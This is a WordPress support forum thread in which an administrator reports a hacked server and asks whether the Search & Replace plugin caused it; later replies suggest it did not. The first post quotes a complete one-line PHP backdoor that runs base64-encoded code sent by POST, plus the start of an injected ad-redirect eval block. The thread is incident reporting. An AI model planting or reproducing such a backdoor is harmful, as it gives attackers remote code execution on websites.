Support » Plugin: Search & Replace » Possible security issue in "search and repalce" 2.6

  • Hi,

    One the server I’m administrating was corrupted. We aren’t exactly sure about what happened yet but here’s what we’ve found:
    – There’s a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
    – There’s a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
    – There are several plugins installed on this WordPress, including “search and replace”, but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin:

    I just wanted to let you know and see if other users had similar troubles.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Hi
    I was just about to use this plugin, but have read this and am now rather concerned. Did this plugin prove to be the problem? Has anyone else encountered it?


    We haven’t been able to gather more information about our security issue, and as you can see, no one else reported similar problems.
    I guess this plugin is not to blame after all.

    Thanks for the update – that’s good to know.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Possible security issue in "search and repalce" 2.6’ is closed to new replies.